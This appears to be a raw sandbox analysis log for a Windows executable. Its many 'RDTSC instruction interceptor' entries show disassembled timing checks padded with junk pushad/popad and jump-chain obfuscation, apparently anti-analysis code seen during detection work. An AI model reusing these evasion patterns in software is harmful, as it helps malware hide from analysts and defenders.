Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0CA0 second address: 73B0D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007F269ADB3899h 0x0000000c pushad 0x0000000d mov ch, F2h 0x0000000f pushfd 0x00000010 jmp 00007F262CBE4E97h 0x00000015 adc eax, 5AE0CFFEh 0x0000001b jmp 00007F262CBE4E99h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebp-04h] 0x00000025 pushad 0x00000026 mov di, ax 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c mov bh, ah 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [esi+08h], eax 0x00000033 jmp 00007F262CBE4E97h 0x00000038 lea eax, dword ptr [ebx+70h] 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F262CBE4E95h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0D2A second address: 73B0D7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F262D38FB0Ch 0x00000012 or al, FFFFFFE8h 0x00000015 jmp 00007F262D38FB0Bh 0x0000001a popfd 0x0000001b movzx esi, di 0x0000001e popad 0x0000001f push esp 0x00000020 pushad 0x00000021 mov al, 4Ah 0x00000023 movsx edi, ax 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F262D38FB0Ch 0x00000033 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0D7D second address: 73B0D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0D81 second address: 73B0D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0D87 second address: 73B0D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0D8D second address: 73B0D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0D91 second address: 73B0DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b jmp 00007F262CBE4E94h 0x00000010 nop 0x00000011 jmp 00007F262CBE4E90h 0x00000016 push eax 0x00000017 jmp 00007F262CBE4E8Bh 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0DD4 second address: 73B0DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0DD8 second address: 73B0DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0DDE second address: 73B0DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0DE4 second address: 73B0DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0DE8 second address: 73B0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0E5A second address: 73B0E87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0E87 second address: 73B0E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0E8D second address: 73B0EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0EA6 second address: 73B0EEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e jmp 00007F262D38FB0Eh 0x00000013 mov edx, 756006ECh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F262D38FB17h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0EEC second address: 73B0EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0EF2 second address: 73B0EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0EF6 second address: 73B0EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0EFA second address: 73B0F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d jmp 00007F262D38FB0Ch 0x00000012 lock cmpxchg dword ptr [edx], ecx 0x00000016 jmp 00007F262D38FB10h 0x0000001b pop edi 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F262D38FB0Eh 0x00000023 sbb si, E298h 0x00000028 jmp 00007F262D38FB0Bh 0x0000002d popfd 0x0000002e push eax 0x0000002f push edx 0x00000030 mov eax, 79BFFCE5h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0F50 second address: 73B0F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test eax, eax 0x00000007 jmp 00007F262CBE4E97h 0x0000000c jne 00007F269ADB35F4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0F7A second address: 73B0F95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0F95 second address: 73B0FAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FAD second address: 73B0FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FB1 second address: 73B0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FC2 second address: 73B0FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FC6 second address: 73B0FCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FCC second address: 73B0FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FE3 second address: 73B0FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B0FE7 second address: 73B1002 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1002 second address: 73B101A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B101A second address: 73B1053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F262D38FB16h 0x00000015 adc esi, 52A58008h 0x0000001b jmp 00007F262D38FB0Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1053 second address: 73B113E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushfd 0x00000007 jmp 00007F262CBE4E90h 0x0000000c adc si, A268h 0x00000011 jmp 00007F262CBE4E8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+04h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F262CBE4E94h 0x00000024 xor eax, 7D5E74C8h 0x0000002a jmp 00007F262CBE4E8Bh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F262CBE4E98h 0x00000036 xor ax, F728h 0x0000003b jmp 00007F262CBE4E8Bh 0x00000040 popfd 0x00000041 popad 0x00000042 mov dword ptr [edx+04h], eax 0x00000045 jmp 00007F262CBE4E96h 0x0000004a mov eax, dword ptr [esi+08h] 0x0000004d jmp 00007F262CBE4E90h 0x00000052 mov dword ptr [edx+08h], eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 call 00007F262CBE4E8Dh 0x0000005d pop esi 0x0000005e pushfd 0x0000005f jmp 00007F262CBE4E91h 0x00000064 or cx, 6756h 0x00000069 jmp 00007F262CBE4E91h 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B113E second address: 73B1143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1143 second address: 73B1214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F262CBE4E8Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+0Ch] 0x00000010 pushad 0x00000011 mov dl, AFh 0x00000013 pushfd 0x00000014 jmp 00007F262CBE4E96h 0x00000019 sub si, C3D8h 0x0000001e jmp 00007F262CBE4E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [edx+0Ch], eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F262CBE4E94h 0x0000002f add ch, 00000038h 0x00000032 jmp 00007F262CBE4E8Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F262CBE4E98h 0x0000003e xor esi, 1C8B0898h 0x00000044 jmp 00007F262CBE4E8Bh 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr [esi+10h] 0x0000004e pushad 0x0000004f mov edx, ecx 0x00000051 call 00007F262CBE4E90h 0x00000056 mov ax, F3D1h 0x0000005a pop esi 0x0000005b popad 0x0000005c mov dword ptr [edx+10h], eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F262CBE4E98h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1214 second address: 73B121A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B121A second address: 73B124C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b jmp 00007F262CBE4E99h 0x00000010 mov dword ptr [edx+14h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, di 0x00000019 mov dx, 93DAh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B124C second address: 73B130B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1D70F43Dh 0x00000008 mov bx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+18h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F262D38FB12h 0x00000018 or si, F148h 0x0000001d jmp 00007F262D38FB0Bh 0x00000022 popfd 0x00000023 push esi 0x00000024 mov edi, 395AB2EAh 0x00000029 pop edi 0x0000002a popad 0x0000002b mov dword ptr [edx+18h], eax 0x0000002e jmp 00007F262D38FB0Eh 0x00000033 mov eax, dword ptr [esi+1Ch] 0x00000036 jmp 00007F262D38FB10h 0x0000003b mov dword ptr [edx+1Ch], eax 0x0000003e pushad 0x0000003f movzx eax, bx 0x00000042 call 00007F262D38FB13h 0x00000047 pushfd 0x00000048 jmp 00007F262D38FB18h 0x0000004d adc cx, 4868h 0x00000052 jmp 00007F262D38FB0Bh 0x00000057 popfd 0x00000058 pop esi 0x00000059 popad 0x0000005a mov eax, dword ptr [esi+20h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F262D38FB12h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B130B second address: 73B1311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1311 second address: 73B1360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b pushad 0x0000000c jmp 00007F262D38FB0Fh 0x00000011 pushfd 0x00000012 jmp 00007F262D38FB18h 0x00000017 sub esi, 1E32A058h 0x0000001d jmp 00007F262D38FB0Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+24h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1360 second address: 73B1369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 5C34h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1369 second address: 73B13EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 0BFFh 0x00000007 jmp 00007F262D38FB14h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+24h], eax 0x00000012 pushad 0x00000013 movzx eax, dx 0x00000016 mov cx, bx 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+28h] 0x0000001d pushad 0x0000001e jmp 00007F262D38FB0Bh 0x00000023 call 00007F262D38FB18h 0x00000028 mov edi, eax 0x0000002a pop eax 0x0000002b popad 0x0000002c mov dword ptr [edx+28h], eax 0x0000002f jmp 00007F262D38FB0Dh 0x00000034 mov ecx, dword ptr [esi+2Ch] 0x00000037 jmp 00007F262D38FB0Eh 0x0000003c mov dword ptr [edx+2Ch], ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 movsx edx, si 0x00000045 mov di, ax 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B13EB second address: 73B1404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1404 second address: 73B1408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1408 second address: 73B140C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B140C second address: 73B1412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1412 second address: 73B145F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e movzx eax, bx 0x00000011 movsx edx, cx 0x00000014 popad 0x00000015 mov ax, word ptr [esi+32h] 0x00000019 jmp 00007F262CBE4E92h 0x0000001e mov word ptr [edx+32h], ax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F262CBE4E97h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B145F second address: 73B1465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1465 second address: 73B1469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1469 second address: 73B146D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B146D second address: 73B14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F262CBE4E98h 0x00000014 sbb al, FFFFFF88h 0x00000017 jmp 00007F262CBE4E8Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B14A4 second address: 73B14D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F262D38FB17h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B14D8 second address: 73B1564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F262CBE4E8Ah 0x00000017 or ecx, 527559A8h 0x0000001d jmp 00007F262CBE4E8Bh 0x00000022 popfd 0x00000023 jmp 00007F262CBE4E98h 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F262CBE4E92h 0x0000002f or si, 4738h 0x00000034 jmp 00007F262CBE4E8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b jne 00007F269ADB3045h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1564 second address: 73B156A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B156A second address: 73B1570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1570 second address: 73B1574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1574 second address: 73B1578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B1578 second address: 73B162A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d mov si, 782Dh 0x00000011 popad 0x00000012 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000016 pushad 0x00000017 call 00007F262D38FB15h 0x0000001c mov si, 1E37h 0x00000020 pop eax 0x00000021 mov ecx, ebx 0x00000023 popad 0x00000024 or dword ptr [edx+40h], FFFFFFFFh 0x00000028 jmp 00007F262D38FB0Fh 0x0000002d pop esi 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F262D38FB14h 0x00000035 add ah, FFFFFF88h 0x00000038 jmp 00007F262D38FB0Bh 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007F262D38FB18h 0x00000044 jmp 00007F262D38FB15h 0x00000049 popfd 0x0000004a popad 0x0000004b pop ebx 0x0000004c pushad 0x0000004d mov cx, E273h 0x00000051 mov ah, 32h 0x00000053 popad 0x00000054 leave 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov cx, 4E63h 0x0000005c mov bx, ax 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B162A second address: 73B163E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262CBE4E90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73B163E second address: 73B1642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0793 second address: 73A07FA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F262CBE4E92h 0x00000008 adc si, A538h 0x0000000d jmp 00007F262CBE4E8Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F262CBE4E94h 0x00000020 jmp 00007F262CBE4E95h 0x00000025 popfd 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop edi 0x00000029 mov dh, al 0x0000002b popad 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A07FA second address: 73A0800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0800 second address: 73A0806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A0806 second address: 73A080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 73A080A second address: 73A080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340072 second address: 734008C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 734008C second address: 7340090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 7340090 second address: 734009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, 5Bh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: 734009F second address: 73400E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, A8h 0x00000005 pushfd 0x00000006 jmp 00007F262CBE4E98h 0x0000000b or esi, 15229C28h 0x00000011 jmp 00007F262CBE4E8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F262CBE4E90h 0x00000025 rdtsc
